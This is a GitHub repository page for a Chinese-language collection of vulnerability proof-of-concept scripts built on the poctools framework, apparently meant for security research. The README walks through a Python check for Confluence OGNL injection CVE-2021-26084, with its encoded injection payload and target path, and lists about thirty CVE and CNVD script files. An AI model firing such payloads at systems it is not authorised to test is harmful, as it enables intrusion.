pocs

使用poctools框架编写的漏洞PoC脚本集合，框架问题和PoC问题都可以在本项目提交issue。

poctools框架适用于个人做漏洞研究，批量扫描引擎请使用: https://github.com/yanmengfei/spoce

安装框架

pip install poctools -i https://pypi.org/simple/

使用

以Atlassian Confluence Server 注入漏洞(CVE-2021-26084)为例

1. 修改目标

from poctools import BasicPoc

class AtlassianConfluenceServerConsolePoc(BasicPoc):

    path = "/pages/doenterpagevariables.action"
    payload = "queryString=aaa%5Cu0027%2B%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D%7D%2B%5Cu0027bbb"
    validate = "aaa{class java.lang.String=null}bbb"
    

    def __init__(self):
        super(AtlassianConfluenceServerConsolePoc, self).__init__()
        self.name = "AtlassianConfluence任意命令执行"
    
    def verify(self, url):
        self.set_headers({"Content-Type": "application/x-www-form-urlencoded"})
        response = self.post(url+self.path, data=self.payload)
        if response is None:
            return False
        return self.validate in response.text


if __name__ == '__main__':
    target = "127.0.0.1:1990"
    poc = AtlassianConfluenceServerConsolePoc()
    result = poc.run(target)
    print(f"{target} -> {result}")

2. 运行

python3 atlassian-cve-2021-26084.py

Name		Name	Last commit message	Last commit date
Latest commit History 31 Commits
.gitignore		.gitignore
CNVD_2020_31512.py		CNVD_2020_31512.py
CNVD_2021_15528.py		CNVD_2021_15528.py
CNVD_2021_32085.py		CNVD_2021_32085.py
CNVD_2021_41968.py		CNVD_2021_41968.py
CNVD_2021_54086.py		CNVD_2021_54086.py
CNVD_2022_10270.py		CNVD_2022_10270.py
CVE_2020_17453.py		CVE_2020_17453.py
CVE_2020_5902.py		CVE_2020_5902.py
CVE_2020_6171.py		CVE_2020_6171.py
CVE_2021_26084.py		CVE_2021_26084.py
CVE_2021_3019.py		CVE_2021_3019.py
CVE_2021_39211.py		CVE_2021_39211.py
CVE_2021_39226.py		CVE_2021_39226.py
CVE_2021_39316.py		CVE_2021_39316.py
CVE_2021_39327.py		CVE_2021_39327.py
CVE_2021_41174.py		CVE_2021_41174.py
CVE_2021_41773.py		CVE_2021_41773.py
CVE_2021_41951.py		CVE_2021_41951.py
CVE_2021_42913.py		CVE_2021_42913.py
CVE_2021_44077.py		CVE_2021_44077.py
CVE_2022_22536.py		CVE_2022_22536.py
CVE_2022_22947.py		CVE_2022_22947.py
CVE_2022_23854.py		CVE_2022_23854.py
CVE_2022_34576.py		CVE_2022_34576.py
CVE_2022_36642.py		CVE_2022_36642.py
CVE_2022_38463.py		CVE_2022_38463.py
CVE_2022_40879.py		CVE_2022_40879.py
CVE_2022_41473.py		CVE_2022_41473.py
CVE_2022_42233.py		CVE_2022_42233.py
LICENSE		LICENSE
README.md		README.md
atlassian-cve-2021-26084.py		atlassian-cve-2021-26084.py
ip_guard.py		ip_guard.py
jboss-cve-2017-7504.py		jboss-cve-2017-7504.py
network_video_weak_cipher.py		network_video_weak_cipher.py
requirement.txt		requirement.txt

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

pocs

安装框架

使用

1. 修改目标

2. 运行

3. 漏洞利用效果

About

Releases

Packages

Contributors 4

Languages

License

ZZ-SOCMAP/Pocs-Exps

Folders and files

Latest commit

History

Repository files navigation

pocs

安装框架

使用

1. 修改目标

2. 运行

3. 漏洞利用效果

About

Resources

License

Stars

Watchers

Forks

Releases

Packages 0

Contributors 4

Languages

Packages